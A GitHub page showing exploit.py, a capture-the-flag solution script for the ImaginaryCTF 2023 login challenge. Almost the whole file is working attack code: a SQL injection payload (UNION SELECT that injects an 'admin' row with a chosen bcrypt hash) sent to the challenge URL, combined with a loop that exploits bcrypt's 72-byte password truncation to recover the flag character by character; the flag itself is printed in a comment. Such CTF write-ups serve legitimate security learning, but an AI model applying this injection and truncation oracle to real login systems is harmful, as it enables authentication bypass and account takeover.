-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
37 lines (27 loc) · 982 Bytes
/
exploit.py
File metadata and controls
37 lines (27 loc) · 982 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
### https://github.com/f0rk3b0mb/ImaginaryCTF_login
### Code created by f0rk3b0mb
### for ImaginaryCTF2023
### 22 july 2023
import string
import requests
import bcrypt
import os
#xxx' UNION SELECT 'admin' AS username,'$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi' AS pwhash--
url="http://login.chal.imaginaryctf.org/?688a35c685a7a654abc80f8e123ad9f0"
#flag : ictf{why_are_bcrypt_truncating_my_passwords?!}
secret=["i","c","t","f"]
while True:
length=71-len(secret)
overflow="A"*length
for i in string.printable[:-6]:
guess=overflow+"".join(secret)+str(i)
hash=os.popen(f"php hasher.php {guess}").read()
headers={"Content-Type": "application/x-www-form-urlencoded"}
data=f"username=xxx'+UNION+SELECT+'admin'+AS+username,'{hash}'+AS+pwhash--&password={overflow}"
r=requests.post(url,data=data,headers=headers)
if "Welcome admin" in r.text:
secret.append(i)
print(f"found ...","".join(secret))
break
else:
print(f"trying {i}...")